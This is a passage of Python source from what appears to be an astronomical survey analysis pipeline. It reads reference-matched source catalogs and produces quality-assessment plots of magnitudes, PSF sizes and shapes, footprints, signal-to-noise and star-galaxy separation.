to be read in.\n dataset : `str`\n Name of the catalog ``dataset`` to be read in, e.g.\n \"deepCoadd_obj\" (for coadds) or \"source\" (for visits).\n refObjLoader :\n `lsst.pex.config.configurableField.ConfigurableInstance` of\n `lsst.meas.algorithms.loadReferenceObjects.LoadReferenceObjectsTask`\n Reference object loader to read in the reference catalogs.\n aliasDictList : `dict` or `None`, optional\n A `dict` of alias columns to add for backwards compatibility with\n old repositories.\n goodFlagList : `list` of `str`, optional\n List of column flag names for which to retain catalog sources\n having any one of them set to `True`, regardless of any other flags\n being set. For example, it may be desirable to keep all sources\n that were used in the SFM calibration (identified by the\n \"calib_*_used\" flags).\n haveForced : `bool`, optional\n A boolean indicating if a forced_src catalog exists in the\n repository associated with ``repoInfo``.\n doApplyExternalPhotoCalib : `bool`, optional\n If `True`: Apply the external photometric calibrations specified by\n ``repoInfo.photoCalibDataset`` to the catalog.\n If `False`: Apply the ``fluxMag0`` photometric calibration from\n Single Frame Measurement to the catalog.\n doApplyExternalSkyWcs : `bool`, optional\n If `True`: Apply the external astrometric calibrations specified by\n ``repoInfo.skyWcsDataset`` to the catalog.\n If `False`: Retain the WCS from Single Frame Measurement.\n useMeasMosaic : `bool`, optional\n Use meas_mosaic's applyMosaicResultsCatalog for the external\n calibration (even if photoCalib object exists). For testing\n implementations.\n readPackedMatchesOnly : `bool`, optional\n If `True`, simply read in and denormalize the persisted srcMatch\n tables, i.e. 
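those that record the matches used in the SFM\n astrometric calibration, and return the result.\n\n A minimal calling sketch (argument values are placeholders, shown\n for illustration only)::\n\n allMatches, matchAreaDict = self.readSrcMatches(\n repoInfo, dataRefList, \"source\", refObjLoader,\n haveForced=False)\n\n 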
Raises\n ------\n TaskError\n If no matches are found in the entire ``dataRefList``.\n\n Returns\n -------\n allMatches : `pandas.core.frame.DataFrame`\n The concatenated matched catalog.\n matchAreaDict : `dict`\n A `dict` containing the area and corner locations of each element\n (detector for visits, patch for coadds).\n \"\"\"\n matchList = []\n matchAreaDict = {}\n dataIdSubList = []\n butler = repoInfo.butler\n for dataRef in dataRefList:\n dataId = dataRef[\"dataId\"] if repoInfo.isGen3 else dataRef.dataId\n if not repoInfo.isGen3:\n if not dataRef.datasetExists(dataset):\n self.log.info(\"Dataset does not exist: {0!r}, {1:s}\".format(dataId, dataset))\n continue\n else:\n try:\n dataRef[\"butler\"].getURI(dataset, dataId=dataId)\n except LookupError:\n self.log.info(\"Dataset does not exist: {0!r}, {1:s}\".format(dataId, dataset))\n continue\n # Generate unnormalized match list (using load center and radius\n # obtained from the normalized persisted srcMatch catalog) with\n # loadReferencesAndMatchToCatalog (which requires a refObjLoader to\n # be initialized).\n if self.config.doReadParquetTables:\n if \"Coadd\" in dataset:\n datasetType = dataset[:dataset.find(\"Coadd_\") + len(\"Coadd_\")] + \"obj\"\n dfDataset = dataset[dataset.find(\"Coadd_\") + len(\"Coadd_\"):]\n baseDataset = dataset[:dataset.find(\"Coadd_\") + len(\"Coadd_\") - 1]\n else:\n datasetType = \"source\"\n dfDataset = \"\"\n baseDataset = \"\"\n catalog, _ = self.readParquetTables([dataRef, ], datasetType, repoInfo, dfDataset=dfDataset,\n doApplyExternalPhotoCalib=doApplyExternalPhotoCalib,\n doApplyExternalSkyWcs=doApplyExternalSkyWcs,\n useMeasMosaic=useMeasMosaic)\n areaDict, _ = computeAreaDict(repoInfo, [dataRef, ], dataset=baseDataset)\n else:\n if \"patch\" in dataId: # This is a coadd catalog\n catalogStruct = self.readAfwCoaddTables([dataRef, ], repoInfo, haveForced,\n aliasDictList=aliasDictList)\n if \"Coadd_meas\" in dataset:\n catalog = catalogStruct.unforced\n if \"Coadd_forced_src\" in dataset:\n catalog = catalogStruct.forced\n areaDict = catalogStruct.areaDict\n else: # This is a visit catalog\n catStruct = self.readCatalogs(\n [dataRef, ], dataset, repoInfo, aliasDictList=aliasDictList,\n readFootprintsAs=self.config.readFootprintsAs,\n doApplyExternalPhotoCalib=doApplyExternalPhotoCalib,\n doApplyExternalSkyWcs=doApplyExternalSkyWcs, useMeasMosaic=useMeasMosaic)\n catalog = catStruct.catalog\n catalog = catalog.asAstropy().to_pandas().set_index(\"id\", drop=False)\n areaDict = catStruct.areaDict\n # Collect the MJDs of the contributing exposures to estimate an\n # epoch for the reference loading.\n mjdList = []\n if \"Coadd\" in dataset:\n packedMatches = butler.get(self.config.coaddName + \"Coadd_measMatch\", dataId)\n coaddUri = butler.getUri(self.config.coaddName + \"Coadd_calexp\", dataId)\n coaddReader = afwImage.ExposureFitsReader(coaddUri)\n for visit in coaddReader.readCoaddInputs().visits[\"id\"]:\n try:\n for ccd in repoInfo.camera:\n if ccd.getType() == cameraGeom.DetectorType.SCIENCE:\n if dataRef.datasetExists(\"calexp\", visit=int(visit), ccd=ccd.getId()):\n ccdExists = ccd\n break\n calexpUri = butler.getUri(\"calexp\", visit=int(visit), ccd=ccdExists.getId())\n calexpReader = afwImage.ExposureFitsReader(calexpUri)\n mjd = calexpReader.readVisitInfo().getDate().get(system=DateTime.MJD,\n scale=DateTime.TAI)\n except Exception:\n mjd = np.nan\n mjdList.append(mjd)\n else:\n packedMatches = 
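butler.get(dataset + \"Match\", dataId)\n # Best-effort epoch for the reference loading: try the EPOCH entry\n # in the match metadata first, fall back to the MJD in the calexp\n # header, and record NaN on failure; the per-dataRef values are\n # averaged into epoch below.\n 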
matchMeta = packedMatches.table.getMetadata()\n try:\n mjd = matchMeta.getDouble(\"EPOCH\")\n except Exception:\n try:\n if not repoInfo.isGen3:\n rawUri = butler.getUri(\"calexp\", dataId)\n else:\n rawUri = butler.getURI(dataset + \"calexp\", dataId)\n rawUri = rawUri.path\n rawReader = afwImage.ExposureFitsReader(rawUri)\n mjd = rawReader.readMetadata().getDouble(\"MJD\")\n except Exception:\n mjd = np.nan\n mjdList.append(mjd)\n epoch = np.nanmean(mjdList) if not all(np.isnan(mjdList)) else None\n\n if not packedMatches:\n self.log.warning(\"No good matches for %s\" % (dataId,))\n continue\n if hasattr(refObjLoader, \"apply\"): # Need to/can only do this once per loader\n refObjLoader = refObjLoader.apply(butler=butler)\n if readPackedMatchesOnly:\n calibKey = \"calib_astrometry_used\" if \"patch\" not in dataId else None\n matches = loadDenormalizeAndUnpackMatches(catalog, packedMatches, refObjLoader, epoch=epoch,\n calibKey=calibKey, log=self.log)\n if matches is None:\n return None\n else:\n matchMeta = packedMatches.table.getMetadata()\n matches = loadReferencesAndMatchToCatalog(\n catalog, matchMeta, refObjLoader, epoch=epoch, matchRadius=self.matchRadius,\n matchFlagList=self.config.analysis.flags, goodFlagList=goodFlagList,\n minSrcSn=self.config.minSrcSignalToNoiseForMatches, log=self.log)\n # LSST reads in reference catalogs with flux in \"nanojanskys\", so\n # must convert to AB.\n matches = matchNanojanskyToAB(matches)\n matchAreaDict.update(areaDict)\n if matches.empty:\n self.log.warning(\"No matches for %s\" % (dataId,))\n else:\n if \"patch\" not in dataId: # This is a visit catalog\n if self.config.doApplyExternalSkyWcs:\n # Update \"distance\" between reference and source\n # matches based on external-calibration positions.\n angularDist = AngularDistance(\"ref_coord_ra\", \"src_coord_ra\",\n \"ref_coord_dec\", \"src_coord_dec\")\n matches[\"distance\"] = angularDist(matches)\n\n # Avoid multi-counting when visit overlaps multiple tracts\n noTractId = dataId.copy()\n noTractId.pop(\"tract\")\n if noTractId not in dataIdSubList:\n matchList.append(matches)\n dataIdSubList.append(noTractId)\n else:\n matchList.append(matches)\n if not matchList:\n if repoInfo.isGen3:\n msg = \"No matches read: %s\" % ([dataRef[\"dataId\"] for dataRef in dataRefList])\n else:\n msg = \"No matches read: %s\" % ([dataRef.dataId for dataRef in dataRefList])\n raise TaskError(msg)\n\n allMatches = pd.concat(matchList, axis=0)\n return allMatches, matchAreaDict\n\n def calibrateCatalogs(self, catalog, wcs=None):\n self.zpLabel = \"common (\" + str(self.config.analysis.coaddZp) + \")\"\n # Some persisted catalogs have NaN for all RA and Dec entries (see\n # DM-9556), so update the coordinates from the wcs if possible.\n if np.all(np.isnan(catalog[\"coord_ra\"])):\n if wcs is None:\n self.log.warning(\"Bad RA, Dec entries but can't update because wcs is None\")\n else:\n afwTable.updateSourceCoords(wcs, catalog)\n calibrated = calibrateSourceCatalog(catalog, self.config.analysis.coaddZp)\n return calibrated\n\n def plotMags(self, catalog, plotInfoDict, areaDict, matchRadius=None,\n matchRadiusUnitStr=None, zpLabel=None, forcedStr=None, fluxToPlotList=None,\n postFix=\"\", flagsCat=None, highlightList=None, uberCalLabel=None):\n yield\n schema = getSchema(catalog)\n if not fluxToPlotList:\n fluxToPlotList = self.config.fluxToPlotList\n unitStr = \"mmag\" if self.config.toMilli else \"mag\"\n enforcer = Enforcer(requireLess={\"star\": {\"stdev\": 0.02*self.unitScale}})\n for col in 
fluxToPlotList:\n if col + \"_instFlux\" in schema:\n shortName = \"mag_\" + col + postFix\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, MagDiff(col + \"_instFlux\", \"base_PsfFlux_instFlux\",\n unitScale=self.unitScale),\n \"Mag(%s) - PSFMag (%s)\" % (fluxToPlotString(col), unitStr),\n shortName, self.config.analysis, labeller=StarGalaxyLabeller(),\n unitScale=self.unitScale,\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, matchRadius=matchRadius,\n zpLabel=zpLabel, forcedStr=forcedStr,\n uberCalLabel=uberCalLabel,\n highlightList=highlightList)\n # Also make comparison plots for calib_psf_used only objects\n # for the circular aperture plots.\n if \"CircularApertureFlux_12_0\" in col:\n shortName = \"mag_\" + col + postFix + \"_calib_psf_used\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n calibHighlightList = highlightList.copy()\n for i, flagName in enumerate([col + \"_flag\", ] + list(self.config.analysis.flags)):\n if not any(flagName in highlight for highlight in calibHighlightList):\n calibHighlightList += [(flagName, 0, FLAGCOLORS[i%len(FLAGCOLORS)]), ]\n yield from self.AnalysisClass(catalog,\n MagDiff(col + \"_instFlux\", \"base_PsfFlux_instFlux\",\n unitScale=self.unitScale),\n (\"%s - PSF (calib_psf_used) (%s)\" % (fluxToPlotString(col),\n unitStr)),\n shortName, self.config.analysis,\n goodKeys=[\"calib_psf_used\"],\n labeller=StarGalaxyLabeller(), unitScale=self.unitScale,\n fluxColumn=\"base_CircularApertureFlux_12_0_instFlux\"\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, matchRadius=matchRadius,\n zpLabel=zpLabel, forcedStr=forcedStr,\n uberCalLabel=uberCalLabel,\n highlightList=calibHighlightList)\n\n def plotSizes(self, catalog, plotInfoDict, areaDict, matchRadius=None, zpLabel=None, forcedStr=None,\n postFix=\"\", highlightList=None, uberCalLabel=None):\n yield\n schema = getSchema(catalog)\n unitStr = \" (milli)\" if self.config.toMilli else \"\"\n plotAllKwargs = dict(matchRadius=matchRadius, zpLabel=zpLabel, forcedStr=forcedStr,\n uberCalLabel=uberCalLabel, highlightList=highlightList)\n calibHighlightList0 = None\n for col in [\"base_PsfFlux\", ]:\n if col + \"_instFlux\" in schema:\n if highlightList is not None:\n calibHighlightList0 = highlightList.copy()\n if not any(col + \"_flag\" in highlight for highlight in calibHighlightList0):\n calibHighlightList0 += [(col + \"_flag\", 0, \"yellow\"), ]\n compareCol = \"base_SdssShape\"\n # Set limits dynamically...can be very different visit-to-visit\n # due to seeing differences. 
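SDSS and HSM should be similar,\n # so limits based on one should be valid for the other and\n # having the same scale eases comparisons between the two.\n # (Illustrative check, not from the pipeline: a round Gaussian PSF\n # with sigma = 2 pixels has Ixx = Iyy = sigma**2 = 4, so the trace\n # radius sqrt(0.5*(Ixx + Iyy)) = 2 pixels, recovering sigma.)\n 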
traceSizeFunc = TraceSize(compareCol)\n\n # First do for calib_psf_used only.\n shortName = \"trace\" + postFix + \"_calib_psf_used\"\n psfUsed = catalog[catalog[\"calib_psf_used\"]].copy(deep=True)\n sdssTrace = traceSizeFunc(psfUsed)\n goodVals = np.isfinite(sdssTrace)\n psfUsed = psfUsed[goodVals].copy(deep=True)\n sdssTrace = sdssTrace[goodVals]\n traceMean = np.around(np.nanmean(sdssTrace), 2)\n traceStd = max(0.03, np.around(4.5*np.nanstd(sdssTrace), 2))\n qMin = traceMean - traceStd\n qMax = traceMean + traceStd\n self.log.info(\"shortName = {:s}\".format(shortName))\n if calibHighlightList0 is not None:\n calibHighlightList = calibHighlightList0.copy()\n if not any(compareCol + \"_flag\" in highlight for highlight in calibHighlightList):\n calibHighlightList += [(compareCol + \"_flag\", 0, \"greenyellow\"), ]\n plotAllKwargs.update(highlightList=calibHighlightList)\n yield from self.AnalysisClass(psfUsed, sdssTrace,\n (\" SdssShape Trace (calib_psf_used): \"\n r\"$\\sqrt{0.5*(I_{xx}+I_{yy})}$ (pixels)\"),\n shortName, self.config.analysis,\n goodKeys=[\"calib_psf_used\"], qMin=qMin, qMax=qMax,\n labeller=StarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n **plotAllKwargs)\n if \"ext_shapeHSM_HsmSourceMoments_xx\" in schema:\n shortName = \"hsmTrace\" + postFix + \"_calib_psf_used\"\n compareCol = \"ext_shapeHSM_HsmSourceMoments\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n if calibHighlightList0 is not None:\n calibHighlightList = calibHighlightList0.copy()\n if not any(compareCol + \"_flag\" in highlight for highlight in calibHighlightList):\n calibHighlightList += [(compareCol + \"_flag\", 0, \"greenyellow\"), ]\n plotAllKwargs.update(highlightList=calibHighlightList)\n yield from self.AnalysisClass(psfUsed, TraceSize(compareCol),\n (r\" HSM Trace (calib_psf_used): $\\sqrt{0.5*(I_{xx}\"\n r\"+I_{yy})}$ (pixels)\"), shortName, self.config.analysis,\n goodKeys=[\"calib_psf_used\"], qMin=qMin, qMax=qMax,\n labeller=StarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n **plotAllKwargs)\n\n # Now for all stars.\n compareCol = \"base_SdssShape\"\n shortName = \"trace\" + postFix\n starsOnly = catalog[catalog[\"base_ClassificationExtendedness_value\"] < 0.5].copy(deep=True)\n sdssTrace = traceSizeFunc(starsOnly)\n self.log.info(\"shortName = {:s}\".format(shortName))\n plotAllKwargs.update(highlightList=highlightList)\n yield from self.AnalysisClass(starsOnly, sdssTrace,\n r\" SdssShape Trace: $\\sqrt{0.5*(I_{xx}+I_{yy})}$ (pixels)\",\n shortName, self.config.analysis, qMin=qMin, qMax=qMax,\n labeller=StarGalaxyLabeller()).plotAll(shortName, plotInfoDict,\n areaDict, self.log,\n **plotAllKwargs)\n if \"ext_shapeHSM_HsmSourceMoments_xx\" in schema:\n shortName = \"hsmTrace\" + postFix\n compareCol = \"ext_shapeHSM_HsmSourceMoments\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(starsOnly, TraceSize(compareCol),\n r\"HSM Trace: $\\sqrt{0.5*(I_{xx}+I_{yy})}$ (pixels)\",\n shortName, self.config.analysis, qMin=qMin, qMax=qMax,\n labeller=StarGalaxyLabeller()).plotAll(shortName,\n plotInfoDict,\n areaDict, self.log,\n **plotAllKwargs)\n\n if col + \"_instFlux\" in schema:\n shortName = \"psfTraceDiff\" + postFix\n compareCol = \"base_SdssShape\"\n psfCompareCol = \"base_SdssShape_psf\"\n if calibHighlightList0 is not None:\n calibHighlightList = calibHighlightList0.copy()\n if not 
any(compareCol + \"_flag\" in highlight for highlight in calibHighlightList):\n calibHighlightList += [(compareCol + \"_flag\", 0, \"greenyellow\"), ]\n if not any(psfCompareCol + \"_flag\" in highlight for highlight in calibHighlightList):\n calibHighlightList += [(psfCompareCol + \"_flag\", 0, \"lime\"), ]\n plotAllKwargs.update(highlightList=calibHighlightList)\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, PsfTraceSizeDiff(compareCol, psfCompareCol),\n \" SdssShape Trace % diff (psf_used - PSFmodel)\", shortName,\n self.config.analysis, flags=[col + \"_flag\"],\n goodKeys=[\"calib_psf_used\"], qMin=-3.0, qMax=3.0,\n labeller=StarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n **plotAllKwargs)\n\n shortName = \"e1Resids\" + postFix\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, E1Resids(compareCol, psfCompareCol,\n unitScale=self.unitScale),\n \" SdssShape e1 resids (psf_used - PSFmodel)%s\" % unitStr,\n shortName, self.config.analysis,\n goodKeys=[\"calib_psf_used\"], qMin=-0.05, qMax=0.05,\n labeller=StarGalaxyLabeller(),\n unitScale=self.unitScale).plotAll(shortName, plotInfoDict,\n areaDict, self.log,\n **plotAllKwargs)\n\n shortName = \"e2Resids\" + postFix\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, E2Resids(compareCol, psfCompareCol,\n unitScale=self.unitScale),\n \" SdssShape e2 resids (psf_used - PSFmodel)%s\" % unitStr,\n shortName, self.config.analysis,\n goodKeys=[\"calib_psf_used\"], qMin=-0.05, qMax=0.05,\n labeller=StarGalaxyLabeller(),\n unitScale=self.unitScale).plotAll(shortName, plotInfoDict,\n areaDict, self.log,\n **plotAllKwargs)\n\n if \"ext_shapeHSM_HsmSourceMoments_xx\" in schema:\n shortName = \"psfHsmTraceDiff\" + postFix\n compareCol = \"ext_shapeHSM_HsmSourceMoments\"\n psfCompareCol = \"ext_shapeHSM_HsmPsfMoments\"\n if calibHighlightList0 is not None:\n calibHighlightList = calibHighlightList0.copy()\n if not any(compareCol + \"_flag\" in highlight for highlight in calibHighlightList):\n calibHighlightList += [(compareCol + \"_flag\", 0, \"greenyellow\"), ]\n if not any(psfCompareCol + \"_flag\" in highlight for highlight in calibHighlightList):\n calibHighlightList += [(psfCompareCol + \"_flag\", 0, \"lime\"), ]\n plotAllKwargs.update(highlightList=calibHighlightList)\n self.log.info(\"shortName = {:s}\".format(shortName))\n\n yield from self.AnalysisClass(catalog, PsfTraceSizeDiff(compareCol, psfCompareCol),\n \"HSM Trace % diff (psf_used - PSFmodel)\", shortName,\n self.config.analysis,\n goodKeys=[\"calib_psf_used\"], qMin=-3.0, qMax=3.0,\n labeller=StarGalaxyLabeller(),\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n **plotAllKwargs)\n shortName = \"e1ResidsHsm\" + postFix\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, E1Resids(compareCol, psfCompareCol,\n unitScale=self.unitScale),\n \" HSM e1 resids (psf_used - PSFmodel)%s\" % unitStr,\n shortName, self.config.analysis,\n goodKeys=[\"calib_psf_used\"], qMin=-0.05, qMax=0.05,\n labeller=StarGalaxyLabeller(),\n unitScale=self.unitScale).plotAll(shortName, plotInfoDict,\n areaDict, self.log,\n **plotAllKwargs)\n shortName = \"e2ResidsHsm\" + postFix\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, E2Resids(compareCol, psfCompareCol,\n unitScale=self.unitScale),\n \" HSM e2 resids (psf_used - PSFmodel)%s\" % unitStr,\n 
shortName, self.config.analysis,\n goodKeys=[\"calib_psf_used\"], qMin=-0.05, qMax=0.05,\n labeller=StarGalaxyLabeller(),\n unitScale=self.unitScale).plotAll(shortName, plotInfoDict,\n areaDict, self.log,\n **plotAllKwargs)\n\n def plotCentroidXY(self, catalog, plotInfoDict, areaDict, matchRadius=None, zpLabel=None,\n forcedStr=None, flagsCat=None, uberCalLabel=None, highlightList=None):\n yield\n schema = getSchema(catalog)\n enforcer = None # Enforcer(requireLess={\"star\": {\"stdev\": 0.02*self.unitScale}})\n for col in [\"base_SdssCentroid_x\", \"base_SdssCentroid_y\"]:\n if col in schema:\n shortName = col\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, catalog[col], \"(%s)\" % col, shortName,\n self.config.analysis, labeller=StarGalaxyLabeller(),\n ).plotFP(shortName, plotInfoDict, self.log, enforcer=enforcer,\n matchRadius=matchRadius, zpLabel=zpLabel,\n forcedStr=forcedStr)\n\n def plotFootprint(self, catalog, plotInfoDict, areaDict, matchRadius=None, zpLabel=None, forcedStr=None,\n postFix=\"\", flagsCat=None, plotRunStats=False, highlightList=None, uberCalLabel=None):\n yield\n schema = getSchema(catalog)\n enforcer = None\n plotAllKwargs = dict(matchRadius=matchRadius, zpLabel=zpLabel, forcedStr=forcedStr,\n uberCalLabel=uberCalLabel, highlightList=highlightList)\n if \"calib_psf_used\" in schema:\n shortName = \"footArea_calib_psf_used\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n\n yield from self.AnalysisClass(catalog, catalog[\"base_FootprintArea_value\"], \"%s\" % shortName,\n shortName, self.config.analysis, goodKeys=[\"calib_psf_used\"],\n qMin=-100, qMax=2000, labeller=StarGalaxyLabeller(),\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n plotRunStats=plotRunStats, **plotAllKwargs)\n shortName = \"footArea\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, catalog[\"base_FootprintArea_value\"], \"%s\" % shortName,\n shortName, self.config.analysis,\n qMin=0, qMax=3000, labeller=StarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, plotRunStats=plotRunStats, **plotAllKwargs)\n\n def plotFootprintHist(self, catalog, description, plotInfoDict, matchRadius=None, zpLabel=None,\n postFix=\"\", flagsCat=None, uberCalLabel=None, forcedStr=None):\n yield\n stats = None\n shortName = \"footArea\"\n self.log.info(\"shortName = {:s}\".format(shortName + \"Hist\"))\n yield from self.AnalysisClass(catalog, catalog[\"base_FootprintArea_value\"], \"%s\" % shortName,\n shortName, self.config.analysis, qMin=0, qMax=3000,\n labeller=StarGalaxyLabeller()\n ).plotHistogram(description, plotInfoDict, stats=stats,\n matchRadius=matchRadius, zpLabel=zpLabel,\n filterStr=plotInfoDict[\"filter\"],\n uberCalLabel=uberCalLabel, forcedStr=forcedStr)\n\n def plotPsfFluxSnHists(self, catalog, description, plotInfoDict, areaDict, matchRadius=None,\n zpLabel=None, forcedStr=None, uberCalLabel=None, postFix=\"\",\n logPlot=True, density=True, cumulative=-1):\n yield\n schema = getSchema(catalog)\n stats = None\n shortName = \"psfInstFlux\" if zpLabel == \"raw\" else \"psfCalFlux\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n # want \"raw\" flux\n factor = 10.0**(0.4*self.config.analysis.commonZp) if zpLabel == \"raw\" else NANOJANSKYS_PER_AB_FLUX\n psfFlux = catalog[\"base_PsfFlux_instFlux\"]*factor\n psfFluxErr = catalog[\"base_PsfFlux_instFluxErr\"]*factor\n # Cull here so that all subsets get the same culling\n bad = 
makeBadArray(catalog, flagList=self.config.analysis.flags)\n psfFlux = psfFlux[~bad]\n psfFluxErr = psfFluxErr[~bad]\n psfSn = psfFlux/psfFluxErr\n\n # Scale S/N threshold by ~sqrt(#exposures) if catalog is coadd data\n if \"base_InputCount_value\" in schema:\n inputCounts = catalog[\"base_InputCount_value\"]\n scaleFactor = computeMeanOfFrac(inputCounts, tailStr=\"upper\", fraction=0.1, floorFactor=10)\n if scaleFactor == 0.0:\n scaleFactor = computeMeanOfFrac(inputCounts, tailStr=\"upper\", fraction=0.1, floorFactor=1)\n highSn = np.floor(\n np.sqrt(scaleFactor)*self.config.analysis.signalToNoiseThreshold/100 + 0.49)*100\n else:\n highSn = self.config.analysis.signalToNoiseThreshold\n\n lowSn = 20.0\n lowFlux, highFlux = 4000.0, 12500.0\n goodSn = psfSn > lowSn\n psfFluxSnGtLow = psfFlux[goodSn]\n goodSn = psfSn > highSn\n psfFluxSnGtHigh = psfFlux[goodSn]\n goodFlux = psfFlux > lowFlux\n psfSnFluxGtLow = psfSn[goodFlux]\n goodFlux = psfFlux > highFlux\n psfSnFluxGtHigh = psfSn[goodFlux]\n psfUsedCat = catalog[catalog[\"calib_psf_used\"]]\n psfUsedPsfFlux = psfUsedCat[\"base_PsfFlux_instFlux\"]*factor\n psfUsedPsfFluxErr = psfUsedCat[\"base_PsfFlux_instFluxErr\"]*factor\n psfUsedPsfSn = psfUsedPsfFlux/psfUsedPsfFluxErr\n\n if \"lsst\" in plotInfoDict[\"cameraName\"]:\n filterStr = \"[\" + plotInfoDict[\"cameraName\"] + \"-\" + plotInfoDict[\"filter\"] + \"]\"\n else:\n filterStr = plotInfoDict[\"filter\"]\n yield from self.AnalysisClass(catalog[~bad], psfFlux, \"%s\" % shortName, shortName,\n self.config.analysis, qMin=0,\n qMax=int(min(99999, max(4.0*np.median(psfFlux), 0.25*np.max(psfFlux)))),\n labeller=AllLabeller()\n ).plotHistogram(description, plotInfoDict, numBins=\"sqrt\", stats=stats,\n zpLabel=zpLabel, forcedStr=forcedStr,\n filterStr=filterStr,\n uberCalLabel=uberCalLabel,\n vertLineList=[lowFlux, highFlux],\n logPlot=logPlot, density=False, cumulative=cumulative,\n addDataList=[psfFluxSnGtLow, psfFluxSnGtHigh,\n psfUsedPsfFlux],\n addDataLabelList=[\"S/N>{:.1f}\".format(lowSn),\n \"S/N>{:.1f}\".format(highSn),\n \"psf_used\"])\n shortName = \"psfInstFlux/psfInstFluxErr\" if zpLabel == \"raw\" else \"psfCalFlux/psfCalFluxErr\"\n description = description.replace(\"Flux\", \"FluxSn\")\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog[~bad], psfSn, \"%s\" % \"S/N = \" + shortName, shortName,\n self.config.analysis, qMin=0, qMax=4*highSn, labeller=AllLabeller()\n ).plotHistogram(description, plotInfoDict, numBins=\"sqrt\", stats=stats,\n zpLabel=zpLabel, forcedStr=forcedStr,\n filterStr=filterStr,\n uberCalLabel=uberCalLabel, vertLineList=[lowSn, highSn],\n logPlot=logPlot, density=False, cumulative=cumulative,\n addDataList=[psfSnFluxGtLow, psfSnFluxGtHigh,\n psfUsedPsfSn],\n addDataLabelList=[\"Flux>{:.1f}\".format(lowFlux),\n \"Flux>{:.1f}\".format(highFlux),\n \"psf_used\"])\n\n skyplotKwargs = dict(stats=stats, matchRadius=matchRadius, matchRadiusUnitStr=None, zpLabel=zpLabel)\n\n yield from self.AnalysisClass(catalog[~bad], psfSn, \"%s\" % \"S/N = \" + shortName, shortName,\n self.config.analysis, qMin=0, qMax=1.25*highSn, labeller=AllLabeller(),\n ).plotSkyPosition(description, plotInfoDict, areaDict,\n dataName=\"all\", **skyplotKwargs)\n\n def plotStarGal(self, catalog, plotInfoDict, areaDict, matchRadius=None, zpLabel=None, forcedStr=None,\n highlightList=None, uberCalLabel=None):\n yield\n schema = getSchema(catalog)\n plotAllKwargs = dict(matchRadius=matchRadius, zpLabel=zpLabel, forcedStr=forcedStr,\n 
uberCalLabel=uberCalLabel)\n shortName = \"pStar\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, deconvMomStarGal, \"P(star) from deconvolved moments\",\n shortName, self.config.analysis, qMin=-0.1, qMax=1.39,\n labeller=StarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log, **plotAllKwargs)\n shortName = \"deconvMom\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, deconvMom, \"Deconvolved moments\", shortName,\n self.config.analysis, qMin=-1.0, qMax=3.0,\n labeller=StarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=Enforcer(requireLess={\"star\": {\"stdev\": 0.2}}),\n **plotAllKwargs)\n\n if \"ext_shapeHSM_HsmShapeRegauss_resolution\" in schema:\n shortName = \"resolution\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, catalog[\"ext_shapeHSM_HsmShapeRegauss_resolution\"],\n \"Resolution Factor from HsmRegauss\",\n shortName, self.config.analysis, qMin=-0.1, qMax=1.15,\n labeller=StarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n **plotAllKwargs)\n\n def plotCompareUnforced(self, forced, unforced, plotInfoDict, areaDict, zpLabel=None, fluxToPlotList=None,\n uberCalLabel=None, matchRadius=None, matchRadiusUnitStr=None, highlightList=None):\n yield\n forcedSchema = getSchema(forced)\n fluxToPlotList = fluxToPlotList if fluxToPlotList else self.config.fluxToPlotList\n unitStr = \"mmag\" if self.config.toMilli else \"mag\"\n enforcer = None\n for col in fluxToPlotList:\n magDiffFunc = MagDiff(col + \"_instFlux\", col + \"_instFlux\", unitScale=self.unitScale)\n shortName = \"compareUnforced_\" + col\n self.log.info(\"shortName = {:s}\".format(shortName))\n if col + \"_instFlux\" in forcedSchema:\n yield from self.AnalysisClass(forced, magDiffFunc(forced, unforced),\n \" Forced - Unforced mag [%s] (%s)\" %\n (fluxToPlotString(col), unitStr),\n shortName, self.config.analysis, prefix=\"\",\n labeller=OverlapsStarGalaxyLabeller(first=\"\", second=\"\"),\n unitScale=self.unitScale, compareCat=unforced,\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, matchRadius=matchRadius,\n matchRadiusUnitStr=matchRadiusUnitStr,\n highlightList=highlightList,\n zpLabel=zpLabel, uberCalLabel=uberCalLabel)\n\n def isBad(self, source):\n \"\"\"Return True if any of config.badFlags are set for this source.\n \"\"\"\n for flag in self.config.analysis.flags:\n if source.get(flag):\n return True\n return False\n\n def overlaps(self, catalog, patchList, tractInfo):\n badForOverlap = makeBadArray(catalog, flagList=self.config.analysis.flags,\n onlyReadStars=self.config.onlyReadStars, patchInnerOnly=False)\n goodCat = catalog[~badForOverlap].copy(deep=True)\n overlapPatchList = []\n for patch1 in patchList:\n for patch2 in 